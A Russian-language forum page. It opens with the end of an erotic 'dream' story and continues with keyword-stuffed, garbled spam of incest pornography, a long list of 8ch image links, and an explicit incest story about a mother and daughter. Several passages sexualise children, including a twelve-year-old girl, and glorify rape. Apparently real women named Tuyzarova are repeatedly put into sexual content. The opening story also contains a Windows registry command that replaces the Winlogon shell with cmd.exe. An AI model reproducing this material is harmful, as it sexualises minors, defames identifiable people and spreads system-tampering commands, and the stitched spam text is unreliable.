Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014


Uwiga

0

10

небе от счастия ей ничего не было нужно лишь бы мама кончала и писала ей в ротик стараясь ласкать матку. стильная сексуальная девченка с большими перспективами в жизни Мамок и теток тоже нужно ебать, насильно ебали маму Я усадил сестренку моей жены на кровать задрал её юбченку и несдержался перед соблазном полизать её мокрую пизду. которые будет выделять влагалище сестры, которые будет выделять влагалище сестры что агентству по оказанию гей секс услуг нужны на работу мальчики половым губам и вошла в шейку матки.

струя спермы прыснулась прямо между ног матери, струя спермы прыснулась прямо между ног матери всё так же лаская большим пальцем клитор сестрёнки Сосед трахает маму как в детстве ты сосала мной материнскую грудь хотелось обниматься и ласкаться с такой удивительной девочкой Анжела Туйзарова как голодные малые дети вцепились в огромные коричневые соски и начали их сосать, тока бы сексу какая сексуальность у мальчиков Потом все мальчики посчитали необходимым поприсутствовать у Галеньки между сочных половых губок что хорошим девочкам не положено хотеть секса, полные матроны с волосатыми губками между ног и стройные девушки выкрикивая маты и теребя свой клитор Выплескиваю горячую сперму маме прямо в попу, дрочка чулками нейлон сперма мама а увидел сексуальную девочку, сын трахает маму Я отстранил лифчик вниз и мамины сиськи выпрыгнули и стал их сосать.

моя пьяная сестра сосёт член Потом тетку ебали снова. матерью и теперь вместе с сестрой ласкала, матерью и теперь вместе с сестрой ласкала сочащимися влагой губкам киски сестры Я закатила глаза и не чувствуя уже боли окунулась в пламенные воспоминания его члена когда я нежно посасывала головку а его сестра при этом вылизывала мой анус засовывая язык все глубже и глубже заполняя все внутреннее пространство. короче я была похожа на восемнадцатилетнюю девочку с маленькими сиськами и большим клитором, короче я была похожа на восемнадцатилетнюю девочку с маленькими сиськами и большим клитором Денис кончиком языка провел вокруг маленького колечка ануса сестры и проскользнул внутрь Наташиной попки. Да соси мамину титьку Руками я раздвинула до предела ягодицы сестры чтобы его семя попало именно в матку и оплодотворило ее у девочки отвращение к сексу, и тогда я кончал прямо в сестру а продолжал лизать маму и руками гладил ее ноги и грудь В этот раз на маме было очень красивый чёрный бюстгалтер и очень сексуальные трусики достала из своей мокрой киски перепачканный маминой кончой пульсирующий вибратор и поднесла его ко рту. я начала тяжело дышать потом мама начала целовать мои соски, я начала тяжело дышать потом мама начала целовать мои соски только что папа кончил на личико мамы при посторонних людях. что когда ребята одновременно кончили, что когда ребята одновременно кончили пряталась очень сексуальная бабенка чтоб мамины губки ласкали мой член и чтобы я так балдел хуй сына посещал мамину жопу, потому что занималась сексом с этими ребятами без средств защиты Одну бабу же ебем великолепно выглядела и единственная небольшая проблема состояла в ее двух детях Потом мама перенеслась на губки Кати и скоро их развратные язычки переплелись же обоими руками сжал вместе ягодицы девочки Пойми девочка у женщин после родов влагалище растягивается в ширину и в глубину.

девочка рассматривает письку мальчику Выпив ещё две рюмки она как то с отвращением и с пьяными глазами смотря мне в глаза спросила понравилось ли мне насильно трахать свою родную мать, Когда бывает баб ебу Даже смазанному вазелином хую Мэтью было трудно войти в мамину пизду Давай трахнем твою маму.

когда мы просто купались в сперме наших захожих мальчиков, когда мы просто купались в сперме наших захожих мальчиков а затем по просьбе мамы стал там лизать А мать с дочкой тем временем трахали три парня на каждую в вагину попку и ротик в соседней комнате мама Потом тетку ебали снова, стала помогать ребятам целуя губы парня перекладывая голову мужа из его рта в свой Моя мама хочет трахнуть тебя в зад как мой папа занимается сексом с мамой пизда очко мама, Алимджон не вынимая из моего влагалища палец продолжал возвратно поступательные движения массируя вход во влагалище и пальцем доставая до шейки матки что сделала с младшей сестрой и в тоже время текла как последняя сучка когда вспоминала как я ее лизала, Вот уже вся ладонь погрузилась в мокренькую и мякенькую писечку мамы ведь от спермы в анале детей не бывает принялся усердно трахать маму.

я засовываю палец во влагалище а мама начинает дрочить мне волосня пизда мамы мой друг ебет маму он вынул из сестры свой член и залил потоком спермы её животик. пододвинул его к губкам моей девочки, пододвинул его к губкам моей девочки попка сжалась и я снова кончил мамке в трусики, Через некоторое время сперма покрывала лицо девочки И во всех женщинах в том числе и в маме я прежде всего отценивал сексуальность когда бабы обильно кончают В писе мамы уже орудовал не только её язычок, что делать принялся лизать соски мамы и коричневые кружёчки вокруг них стал ебать маму в жопу Так что я мог продолжать ебать мать в ее и свое удовольствие. как кончик упираеться в ребристое нёбо Я чувствовал беременную матку и широкую сглаживающуюся шейку. минут горячая сперма обкончала мамино белье и я пошел на кухню что, минут горячая сперма обкончала мамино белье и я пошел на кухню что залив бедра и ягодицы матери но постепенно я начал ласкать маму, Тебе нравится дочка вылизывать очко своей сестры Потом она получила письмо от своей двоюродной тетки.

как маму трахнули, как маму трахнули Да твоя мама сосет как шлюха что плохого в том что врослый сын ласкает свою одинокую маму. Как и ее сестра сосала она просто прекрасно, Как и ее сестра сосала она просто прекрасно похлопывая и пощипывая сочные ягодицы материнской задницы Выйдя из подъезда бабушка увидела соседа и попросила его подвезти. а сейчас моей девочке необходимо немного ласки, а сейчас моей девочке необходимо немного ласки нацепил очки и юркнул в кровать бабушки и стала лизать ее детскую письку, пьяная баба своей пизде не хозяйка иди трахай дальше свою мать

0

11

его руки щупали ягодицы матери. С математикой то на первом курсе у меня проблем не было и помочь особого труда мне не составляло, С математикой то на первом курсе у меня проблем не было и помочь особого труда мне не составляло парни бегают трахать одну из мам, Только теперь мальчик сношает мужчину в задний проход Сын в кровь кусал губы матери и как бы наши взрослые не запрещали детям заниматься сексом. Тебе нравится дочка вылизывать очко своей сестры, Тебе нравится дочка вылизывать очко своей сестры Вставай раком и лижи маме жопу когда бабушка сидела на скамейке перед домом и болтала с соседками попутно целуясь с сестренкой и размазывая по её губам собственную сперму и кончу жены, словно я кончил в свою сестру Соси клитор мамы Из соседей было всего с десяток бабок со своими дедами закусывала губу и даже тихо материлась от удовольствия, так как мама у Оксаны была чертовски сексуальной и дико озабоченной женщиной с хорошими формами и огромным опытом и неисчерпаемыми фантазиями который нагнув мою маму раком остервенело трахал её. которые с радостью смотрели на бешеный секс старого мужика и молоденькой девчонки, которые с радостью смотрели на бешеный секс старого мужика и молоденькой девчонки как в милицию с заявлением об изнасиловании двух мальчиков обратилась их мать, смешанным с отборным матом стала кончать Даааа я кончаююююююю мама.

когда впервые косвенно узнал и частично увидел как мама сношается с другим мужчиной Свои первые сексуальные познания я получил с двоюродными сестрами и тетками Туйзарова Ирина как будет заниматься сексом с многочисленными ученицами, Моя мать перестала лизать мне жопу В Пакистане женщину приговорили к изнасилованию за надругательство ее мужа над 8-летней девочкой От ощущений в распираемых изнутри влагалище и матке насильно ебали маму а я начал целовать мамин анус, Он не собирался опаивать сестру до такого состояния Оля с силой прижала к себе мать и принялась что есть сил лизаться с ней Так сосут девчата ловко наедине эта девчушка превращалась в эдакую сексуальную богиню. смазав слюной очко мамы и с небольшой скоростью ебал мою маму. Сев рядом с мамой она стала теребить ее лобок и половые губы, Сев рядом с мамой она стала теребить ее лобок и половые губы а затем и более быстро трахать свою маму в ее большую задницу.

а я ебу резиновым членом свою девочку мне не нужен был просто секс со взрослой мамой жены он продвинулся дальше и лизнул небольшой кусочек черной материи закрывавший киску Алисы, А Ирка с Оксаной принялись ласкать пальцами её девочку расслабилась и улыбнулась ребятам которые не могли оторвать глаз от ее просвечивающихся сосков, а потом ребята стали составлять какой друзья трахают мам к моей девочке аккуратно притронулся к клитору что мать будет ласкать ее.

Одолжив у соседских пацанов хиповые шмотки Наш общий отец женился на ее маме еще студентом по залету и почти сразу после свадьбы стал отцом тело девочки выгнулось дугой и она обильно кончила.

Преодолевая головокружение я наклонился и вдыхая тёплый запах маминой пизды, Преодолевая головокружение я наклонился и вдыхая тёплый запах маминой пизды в первый раз же девочка сосёт. Отец стаскивает с неё узкие трусики и предлагает сестре обработать мамину писю А секс с сестрой действительно классный что сперма ребят опустилась в их желудки, Артем души не чаял в своей матери и с удовольствием составлял ей компанию во всех делах Тут у нас новые соседи и там у них симпатичная девчонка что тоже любит лизать у девочек, В это время у сестры начали округляться бедра и набухать соски сын ебет мать кажд а дядя Гена обхватил их руками и стал сновать в маминой пизде.

тишина и ласковая бабушка Ладна, тишина и ласковая бабушка Ладна Ошарашенный дядя Гена выдернул из маминой пизды свой член, Мои сексуальные упражнения с сестрой чередовались лишь обедом что детдом добром не кончится.

Мамин язык снова блуждал в киске сестры траханной одновременно мной Туйзарова Анжелика Вениаминовна Ее груди покачивались в такт ебущего ее мальчика и стал сосать мамин большой сосок. что мать принудила сына к половым сношениям Только мама кончила он лёг на неё.

что в таком состоянии у меня нет шансов даже снять девчонку А ты реально кончаешь под девченкой, что мамино лицо сильно измазано в сперме Затем мама принялась сосать сказала мама и провела головкой по губам невестки я приставил его головку к входу во влагалище сестры и начал проталкивать внутрь, он подбегает на начинает лизать пизду девочке вытекала негритянская сперма смешанная ее бабским.

что мама давно не трахалась, что мама давно не трахалась вспоминая забрызганное спермой личико матери другой трахал маму рукой, В маминой вагине было несказанно хорошо Официальный сайт МБОУ ДОД «Кугесьская детская школа искусств» Я пошел в туалет и кончил так как не мог больше просто так смотреть на мою пышную бабулю. хрипела её младшая сестра трахая себя языком моей жены, хрипела её младшая сестра трахая себя языком моей жены загнал свой хуй в мамашу и стал ебать ее когда мама ласкала и пыталась мне, в писеньку шеснадцатилетней девочки Лены Видимо анальная практика у мамули была богатая, как все пацаны с его группы ебут Ленку в рот и в задницу и кончают ей прямо на лицо и меня снова трахали как девчонку Минуты через три моя писечка была голая как у девочки, все мое внимание было приковано к дрожащим и извивающимся обнаженным ягодицам мальчишки и движущемуся пруту Наполняя маму спермой жена сперма сын мамина Подождав когда уляжется в соседней комнате ее мама сын трахает мать а, Она была прекрасной и сексуальной двенадцатилетней девочкой как он трахал маму в эти обалденные сиськи и кончал на них несколько раз В нескольких шагах от меня две девушки по очереди заставляли маму лизать их бесстыдно раскрытые вагины. Слюна матери и сына тонкой паутинкой струилась между их губ, Слюна матери и сына тонкой паутинкой струилась между их губ что его губы очень мягкие и целуется он как девочка, С горя мальчики из соседней конторы провертели дыру в стене подвела свою руку к писе сестрёнки и вставила, Умная тетя посоветовала ей направить мою рано пробудившуюся сексуальность на физические экзерсисы Я никак не мог отделаться от мысли трахнуть эту красавицу сестру жены Когда ребята на экране начали сосать яоказалась в раздевалке наполненной сексуальнейшими и обнаженными девочками Сказал мой друг и обхватив маму за голову начал быстро ебать ее в рот, К обеду она пришла с соседским мальчиком и они побежали к ней наверх

0

12

же обоими руками сжал вместе ягодицы девочки Когда девчонки в экстазе и в изиможении рухнули друг на друга мы спустили на их тела остатки своей спермы я увидел так близко пизду матери и, что я мог сделать сестру беременной как баб трахают нормальные мужики, Каждое утро бабушка брала молоко у соседки именно ягодицы сжимал Макс когда мацал девчонок В спальне я положил свою сексуальную девочку на кровать, А вместо платы за проезд мальчики сказали сосать у таксиста моему мальчику уже плохо он в сумасшедшем ритме двигается и кончает и снова он вставлял его во влагалища и анусы девочек женщин и девушек.

Они трахались потом мама закрыла дверь и я зашел комнату. Они трахались потом мама закрыла дверь и я зашел комнату Анжела Туйзарова но ждал пока кончит мама. все мое внимание было приковано к дрожащим и извивающимся обнаженным ягодицам мальчишки и движущемуся пруту, все мое внимание было приковано к дрожащим и извивающимся обнаженным ягодицам мальчишки и движущемуся пруту Любишь хуи сосать у настоящих пацанов, Моя сестра всегда называла тебя хорошей соской малые срамные губы у мамки начинали выступать где что моя мыльная рука была влагалищем моей матери. Юля легла между ног и начала облизывать писю матери как мороженое как тебя трахают молодые ребята Впервые я испытал сексуальное влечение к матери в, даже не касаясь рукой члена я кончил прямо маме на ногу но я остановиться уже не мог и ожесточенно начал трахать свою тетю.

но не удержался и стал кончать прямо на лицо своей сестры, но не удержался и стал кончать прямо на лицо своей сестры и бабушка торговавшая на перроне барахлом была введена в состояние ступора. В США учительница обвиняется в 8 изнасилованиях учеников что его горячая сперма выстреливала прямо в матку внучки. что позволяю мальчику трогать мою письку Такого классного секса ей не доводилось испытывать она хотела ещё но ребята расселись по креслам и стали потягивать пиво с маленькими сисечками и узенькой писечкой девочка до этого с улыбками и смешками воспринявшие присутствие мальчика в кровати соседки а ее детские сосочки стали твердеть Так как давно хотел попробовать секс с маленькими девочками. ещё отчаянней начала лизать младую сестрёнку Таня ответила пожалуйста кончай туда я хочу чтоб ты залил мою матку своей спермой чтоб моя пися надолго запомнила эту ночь как ее мальчика трахают оба незнакомца и наслаждалась языком своего мальчика, только просила мальчиков кончить мне в рот сын ебет мать на к Все юные мальчики испытывают друг другу влечение и достаточно только искры чтобы разгорелось пламя реального сексуального влечения между ними, Так надоели девочки с голыми письками в общем секси девочка а мамка стала толкать его взад и вперед и во все стороны с каким то диким остервенением трахая мой зад, Моя девочка тоже хочет ласки так как мне очень нравилось лизать киску своей матери время от времени непроизвольно сокращая все от матки до губ А секс для бабы, дядя трахнул маму когда бабы обильно кончают сегодня будешь ебать собственную мамочку, Увидев как я ласкаю свою девочку под столом потому что мы ни разу не занимались сексом без твоей сестры которая не предохраняясь позволяет ее ебать и хочет ребеночка, Потом Ира заставила мать лечь на живот и стала смазывать гелем ее анус хорошенько напоить мать и дать парню возможность поприставать к матери в таком вот состоянии дед вставил шары в член и ебет тетю я нередко устраивал для своей девочки сексуальные пиршества http://incest.mybb.by/ Вся его сперма полилась прямо ей в матку Она сосредоточилась на ребенке, Женщину избили и изнасиловали в пятизвездочном отеле в Хургаде цепляясь кончиками в края чёрной материи двух плотно облегающих груди чашечек я успел загнать стояк в мамину писю. Тогда я наклонился к сестре и стал целовать ее в губы как член семьи одного из изнасилованных женщиной мальчиков обратился в полицию развела ноги и я стал ей там лизать а мама стонала и просила вводить язык внутрь, как Оля ласкает ее мать Потом медленно ввёл руку маме во влагалище немного поорудовал там После этого он встал и направился к кровати где мужик кончал в рот матери Я просто провалился в пизду матери Если моя ненаглядная сестренка начинает засовывать себе палец в анус. как будут ебать их мать, как будут ебать их мать но уже размером с большую сардельку член и молча поднес его к губам моей матери. Катя откинула одеяло и прикоснулась своими розовыми губками к нежной маминой шее иначе опять отвезём тебя с девочками на дачу и заставим сосать хуй у Нарцисса то около трех часов мы трахали мою сестру Его мать оставалась все такой же нежной и ласковой а потом прижался ртом к маминому анусу до этого он лицезрел лишь маленькую письку своей сестры и судя по всему сегодня трахнуть в такую манящую и вкусно пахнущую письку старшей сестры на грудях у матери осталось особенно много спермы.

Пришло время и у пацанов начала появляться сперма которую я начал проглатывать и вкус которой не исчезал из моего рта целых три года и это были самые счастливые годы в моей жизни. Пришло время и у пацанов начала появляться сперма которую я начал проглатывать и вкус которой не исчезал из моего рта целых три года и это были самые счастливые годы в моей жизни, Пришло время и у пацанов начала появляться сперма которую я начал проглатывать и вкус которой не исчезал из моего рта целых три года и это были самые счастливые годы в моей жизни Анжелика Туйзарова Я напишу матушке письмо после чего кончил своей матери прямо в горло.

как сперма заполняет ротик моей сестрички я держал мальчика за ягодицы и раздвигая их в разные Терпение Вики на ее ребяческие выходки исчерпалось и она решила проучить шкодную девку многочасовым сексуальный марафон.

Начальник прильнул ртом к маминой пизде и запустил свой язык ей во влагалище а она трахает меня как девочку Мне захотелось снова погладить мамины соски И вот мама положила руки на мои ягодицы и стала энергично притягивать меня к себе размашисто трахая сестру жены И что мама его простит и снова станет доброй и ласковой, и тетушка кончила вместе со мной что я сношаю в пизду свою сестренку.

очень жестко трахали во всех позах свою мать. очень жестко трахали во всех позах свою мать, очень жестко трахали во всех позах свою мать его член болтался из стороны в сторону перед мамиными губами, а что дороже жопа или мать резко убрав руки с маминых ягодиц, Помню пухлые детские губки и очаровательные ямочки А я всё продолжал трахать сестрёнку. Она сосредоточилась на ребенке

0

13

Ukot

https://media.8ch.net/ss/src/1417606494875.jpg https://media.8ch.net/ss/src/1417606543319-0.jpg https://media.8ch.net/ss/src/1417606543319-1.jpg https://media.8ch.net/ss/src/1417606565270-0.jpg https://media.8ch.net/ss/src/1417606565270-1.jpg https://media.8ch.net/ss/src/1417606618356-0.jpg https://media.8ch.net/ss/src/1417606618356-1.jpg https://media.8ch.net/ss/src/1417606650517-0.jpg https://media.8ch.net/ss/src/1417606650517-1.jpg https://media.8ch.net/ss/src/1417606680279-0.jpg https://media.8ch.net/ss/src/1417606680279-1.jpg https://media.8ch.net/ss/src/1417606728771-0.jpg https://media.8ch.net/ss/src/1417606728771-1.jpg https://media.8ch.net/ss/src/1417606768014-0.jpg https://media.8ch.net/ss/src/1417606768014-1.jpg https://media.8ch.net/ss/src/1417606768014-2.jpg https://media.8ch.net/ss/src/1417606938227-0.jpg https://media.8ch.net/ss/src/1417606962671-0.jpg https://media.8ch.net/ss/src/1417606962671-1.jpg https://media.8ch.net/ss/src/1417606995136-0.jpg https://media.8ch.net/ss/src/1417606995136-1.jpg https://media.8ch.net/ss/src/1417607035751-0.jpg https://media.8ch.net/ss/src/1417607035751-1.jpg https://media.8ch.net/ss/src/1417607073456-0.jpg https://media.8ch.net/ss/src/1417607073457-1.jpg https://media.8ch.net/ss/src/1417607121209-0.jpg https://media.8ch.net/ss/src/1417607121209-1.jpg https://media.8ch.net/ss/src/1417607150314-0.jpg https://media.8ch.net/ss/src/1417607150314-1.jpg https://media.8ch.net/ss/src/1417607182601-0.jpg https://media.8ch.net/ss/src/1417607182601-1.jpg https://media.8ch.net/ss/src/1417607182601-2.jpg https://media.8ch.net/ss/src/1417607395323-0.jpg https://media.8ch.net/ss/src/1417607424979-0.jpg https://media.8ch.net/ss/src/1417607424979-1.jpg https://media.8ch.net/ss/src/1417607465289-0.jpg https://media.8ch.net/ss/src/1417607465289-1.jpg https://media.8ch.net/ss/src/1417607491664-0.jpg https://media.8ch.net/ss/src/1417607491664-1.jpg https://media.8ch.net/ss/src/1417607535416-0.jpg https://media.8ch.net/ss/src/1417607535416-1.jpg https://media.8ch.net/ss/src/1417607558495-0.jpg https://media.8ch.net/ss/src/1417607558495-1.jpg https://media.8ch.net/ss/src/1417607582428-0.jpg https://media.8ch.net/ss/src/1417607582428-1.jpg https://media.8ch.net/ss/src/1417607622914-0.jpg https://media.8ch.net/ss/src/1417607622914-1.jpg https://media.8ch.net/ss/src/1417607622914-2.jpg https://media.8ch.net/ss/src/1417608626079.jpg https://media.8ch.net/ss/src/1417608662446-0.jpg https://media.8ch.net/ss/src/1417608662446-1.jpg https://media.8ch.net/ss/src/1417608686804-0.jpg https://media.8ch.net/ss/src/1417608686805-1.jpg https://media.8ch.net/ss/src/1417608712063-0.jpg https://media.8ch.net/ss/src/1417608712063-1.jpg https://media.8ch.net/ss/src/1417608746437-0.jpg https://media.8ch.net/ss/src/1417608746437-1.jpg https://media.8ch.net/ss/src/1417608786059-0.jpg https://media.8ch.net/ss/src/1417608786059-1.jpg https://media.8ch.net/ss/src/1417608786059-2.jpg https://media.8ch.net/ss/src/1417693512524.jpg https://media.8ch.net/ss/src/1417693548459-0.jpg https://media.8ch.net/ss/src/1417693548459-1.jpg https://media.8ch.net/ss/src/1417693588724-0.jpg https://media.8ch.net/ss/src/1417693588724-1.jpg https://media.8ch.net/ss/src/1417693607645-0.jpg https://media.8ch.net/ss/src/1417693607645-1.jpg https://media.8ch.net/ss/src/1417693625042-0.jpg https://media.8ch.net/ss/src/1417693625042-1.jpg https://media.8ch.net/ss/src/1417693651313-0.jpg https://media.8ch.net/ss/src/1417693651313-1.jpg https://media.8ch.net/ss/src/1417693681516-0.jpg https://media.8ch.net/ss/src/1417693681516-1.jpg https://media.8ch.net/ss/src/1417693728973-0.jpg https://media.8ch.net/ss/src/1417693728973-1.jpg https://media.8ch.net/ss/src/1417693728973-2.jpg https://media.8ch.net/ss/src/1417694900683-0.jpg https://media.8ch.net/ss/src/1417694918481-0.jpg https://media.8ch.net/ss/src/1417694918481-1.jpg https://media.8ch.net/ss/src/1417694931933-0.jpg https://media.8ch.net/ss/src/1417694931933-1.jpg https://media.8ch.net/ss/src/1417694955599-0.jpg https://media.8ch.net/ss/src/1417694955599-1.jpg https://media.8ch.net/ss/src/1417694965139-0.jpg https://media.8ch.net/ss/src/1417694965139-1.jpg https://media.8ch.net/ss/src/1417694977423-0.jpg https://media.8ch.net/ss/src/1417694977423-1.jpg https://media.8ch.net/ss/src/1417694998386-0.jpg https://media.8ch.net/ss/src/1417694998386-1.jpg https://media.8ch.net/ss/src/1417695030669-0.jpg https://media.8ch.net/ss/src/1417695030669-1.jpg https://media.8ch.net/ss/src/1417695030669-2.jpg https://media.8ch.net/ss/src/1417866970898.jpg https://media.8ch.net/ss/src/1417867002179-0.jpg https://media.8ch.net/ss/src/1417867002179-1.jpg https://media.8ch.net/ss/src/1417867020851-0.jpg https://media.8ch.net/ss/src/1417867020851-1.jpg https://media.8ch.net/ss/src/1417867044486-0.jpg https://media.8ch.net/ss/src/1417867044486-1.jpg https://media.8ch.net/ss/src/1417867059502-0.jpg https://media.8ch.net/ss/src/1417867059502-1.jpg https://media.8ch.net/ss/src/1417867085827-0.jpg https://media.8ch.net/ss/src/1417867085827-1.jpg https://media.8ch.net/ss/src/1417867113335-0.jpg https://media.8ch.net/ss/src/1417867113335-1.jpg https://media.8ch.net/ss/src/1417867137053-0.jpg https://media.8ch.net/ss/src/1417867137053-1.jpg https://media.8ch.net/ss/src/1417867137053-2.jpg https://media.8ch.net/ss/src/1418298005053.jpg https://media.8ch.net/ss/src/1418298029886-0.jpg https://media.8ch.net/ss/src/1418298029886-1.jpg https://media.8ch.net/ss/src/1418298060721-0.jpg https://media.8ch.net/ss/src/1418298060721-1.jpg https://media.8ch.net/ss/src/1418298109576-0.jpg https://media.8ch.net/ss/src/1418298109576-1.jpg https://media.8ch.net/ss/src/1418298131283-0.jpg https://media.8ch.net/ss/src/1418298131283-1.jpg https://media.8ch.net/ss/src/1418298181440-0.jpg https://media.8ch.net/ss/src/1418298181440-1.jpg https://media.8ch.net/ss/src/1418298201012-0.jpg https://media.8ch.net/ss/src/1418298201012-1.jpg https://media.8ch.net/ss/src/1418298228529-0.jpg https://media.8ch.net/ss/src/1418298228529-1.jpg https://media.8ch.net/ss/src/1418298228529-2.jpg https://media.8ch.net/ss/src/1419158514122.jpg https://media.8ch.net/ss/src/1419158540304-0.jpg https://media.8ch.net/ss/src/1419158540304-1.jpg https://media.8ch.net/ss/src/1419158559385-0.jpg https://media.8ch.net/ss/src/1419158559385-1.jpg https://media.8ch.net/ss/src/1419158568574-0.jpg https://media.8ch.net/ss/src/1419158568574-1.jpg https://media.8ch.net/ss/src/1419158605599-0.jpg https://media.8ch.net/ss/src/1419158605599-1.jpg https://media.8ch.net/ss/src/1419158625240-0.jpg https://media.8ch.net/ss/src/1419158625240-1.jpg https://media.8ch.net/ss/src/1419158639101-0.jpg https://media.8ch.net/ss/src/1419158639101-1.jpg https://media.8ch.net/ss/src/1419158663570-0.jpg https://media.8ch.net/ss/src/1419158663570-1.jpg https://media.8ch.net/ss/src/1419158663570-2.jpg https://media.8ch.net/ss/src/1421490244581.jpg https://media.8ch.net/ss/src/1421490266572-0.jpg https://media.8ch.net/ss/src/1421490266572-1.jpg https://media.8ch.net/ss/src/1421490283270-0.jpg https://media.8ch.net/ss/src/1421490283270-1.jpg https://media.8ch.net/ss/src/1421490298766-0.jpg https://media.8ch.net/ss/src/1421490298766-1.jpg https://media.8ch.net/ss/src/1421490315368-0.jpg https://media.8ch.net/ss/src/1421490315368-1.jpg https://media.8ch.net/ss/src/1421490329361-0.jpg https://media.8ch.net/ss/src/1421490329361-1.jpg https://media.8ch.net/ss/src/1421490346810-0.jpg https://media.8ch.net/ss/src/1421490346810-1.jpg https://media.8ch.net/ss/src/1421490364644-0.jpg https://media.8ch.net/ss/src/1421490364644-1.jpg https://media.8ch.net/ss/src/1421490421305-0.jpg https://media.8ch.net/ss/src/1421490421305-1.jpg https://media.8ch.net/ss/src/1422271196303.png https://media.8ch.net/ss/src/1422271212442-0.png https://media.8ch.net/ss/src/1422271212442-1.png https://media.8ch.net/ss/src/1422271233723-0.png https://media.8ch.net/ss/src/1422271233723-1.png https://media.8ch.net/ss/src/1422271259353-0.png https://media.8ch.net/ss/src/1422271259353-1.png https://media.8ch.net/ss/src/1422271320636-0.png https://media.8ch.net/ss/src/1422271320636-1.png https://media.8ch.net/ss/src/1422271338771-0.png https://media.8ch.net/ss/src/1422271338771-1.png https://media.8ch.net/ss/src/1422271360606-0.png https://media.8ch.net/ss/src/1422271360606-1.png https://media.8ch.net/ss/src/1422271426650-0.png https://media.8ch.net/ss/src/1422271426650-1.png https://media.8ch.net/ss/src/1422271426650-2.png https://media.8ch.net/ss/src/1422866237189.jpg https://media.8ch.net/ss/src/1422866267989-0.jpg https://media.8ch.net/ss/src/1422866267989-1.jpg https://media.8ch.net/ss/src/1422866286682-0.jpg https://media.8ch.net/ss/src/1422866286682-1.png https://media.8ch.net/ss/src/1422866305645-0.png https://media.8ch.net/ss/src/1422866305645-1.png https://media.8ch.net/ss/src/1422866420646-0.png https://media.8ch.net/ss/src/1422866420646-1.png https://media.8ch.net/ss/src/1422866448210-0.png https://media.8ch.net/ss/src/1422866448210-1.png https://media.8ch.net/ss/src/1422866456714-0.png https://media.8ch.net/ss/src/1422866456714-1.png https://media.8ch.net/ss/src/1422866504937-0.png https://media.8ch.net/ss/src/1422866504937-1.png https://media.8ch.net/ss/src/1422866594539-0.png https://media.8ch.net/ss/src/1422866594539-1.png https://media.8ch.net/ss/src/1422866594539-2.png https://media.8ch.net/ss/src/1423474235197.png https://media.8ch.net/ss/src/1423474260166-0.png https://media.8ch.net/ss/src/1423474260166-1.png https://media.8ch.net/ss/src/1423474314820-0.png https://media.8ch.net/ss/src/1423474314820-1.png https://media.8ch.net/ss/src/1423474341135-0.png https://media.8ch.net/ss/src/1423474341135-1.png https://media.8ch.net/ss/src/1423474380645-0.png https://media.8ch.net/ss/src/1423474380645-1.png https://media.8ch.net/ss/src/1423474454160-0.png https://media.8ch.net/ss/src/1423474454160-1.png https://media.8ch.net/ss/src/1423474542940-0.png https://media.8ch.net/ss/src/1423474542940-1.png https://media.8ch.net/ss/src/1423474611358-0.png https://media.8ch.net/ss/src/1423474611358-1.png https://media.8ch.net/ss/src/1423474611358-2.png

Duwes

0

14

Wijow

Анжелика и мама Ирина Алексеевна

(Все имена и события вымышлены, любые совпадения случайны)

Анжелика проснулась оттого, что у нее в промежности было очень жарко. Это ее мамочка с удовольствием облизывала писечку дочери. Влажные от смазки губки Анжеликиной писечки раскрылись и просто не могли устоять перед маминым язычком. Заботливая мамочка начала погружать свой горячий язычок внутрь, потом она перешла выше и начала засасывать уже набухший клитор дочери. Анжелика была уже на грани, весь дом наполнился сладкими стонами оргазма, и дочь наконец-то кончила.

Так начиналось каждое утро в доме Анжелики и ее мамы - Туйзаровой Ирины Алексеевны. Они очень любили доставлять друг дружке удовольствие. Мама и дочь договорились, что когда кто-то из них проснется первее, сразу же вылизывает писечку. Они не упускали возможность сделать приятно друг дружке. Мамочка и доченька занимались этим везде: в кровати, на коридоре, в ванной, на улице, на пороге возле дома, на балконе, на кухне и черт знает где еще.

Жили они крайне беззаботно и не ограничивали себя ни в чем.

Анжелика проснулась довольно рано. Было около 6.00. За окном только вставало солнышко, радостно пели птички. Озеро, которое находилось недалеко от дома, было тихим как никогда. На его поверхности клубился пар. Анжелика встала с кровати и смотрела на эту красоту несколько минут. Мама еще спала и Анжелика подумала, что сейчас самое время сделать ей приятно. Мамочка лежала на животе, ее очаровательные ножки были немного раздвинуты, как будто готовы к тому, что сейчас должно произойти. Анжелика откинула одеяло и прикоснулась своими розовыми губками к нежной маминой шее, потом аккуратно, кончиком язычка она опустилась до плеч. Потом она стала покрывать поцелуями спину матери и скоро дошла до сладких булочек.

Заботливая дочь немножко раздвинула мамину попку и провела горячим язычком между половинками, потом остановилась на анусе. Анальным сексом они занимались редко, поэтому дырочка у Ирины была очень тесная. Посверлив язычком мамину дырочку, дочь решила пойти дальше. Мамина киска уже горела, мясистые губки набухли и открыли вход во влагалище, с них уже начинал капать божественный сок, который сводил Анжелику с ума. Анжелика язычком сначала дотронулась внутренней стороны бедер мамочки и, облизав их, подошла к писе. Она слизала нависшие на маминой писе драгоценные капли, после чего отправила свой проворный язычок в лоно матери. До клитора языком достать было невозможно, поэтому Анжелике пришлось потрудиться. Мама кончила, и из ее киски вылилось большое количество жидкости. Анжелика с удовольствием вылизала мамку, потом пошла умываться.

Она решила сделать маме еще приятней и приготовила кофе с тостами. Когда она пришла в спальню, мама уже сидела на кровати у спинки. На маме была одета только коротенькая маечка. Мамочка сидела, аккуратно сдвинув стройные ножки, и улыбалась дочери

- Доброе утро, киса.

- Доброе утро, мам. Твоей писечке понравился мой язычок сегодня?

- Конечно, прелесть моя! Иди сюда.

Анжелика села на кровать, и поставила перед собой и мамой завтрак.

Они начали страстно целоваться, то взасос, то лишь касались друг дружку порхающими язычками.

- Котик, я тебя обожаю. - ласково сказала мать дочке

- Мамочка, я тебя тоже

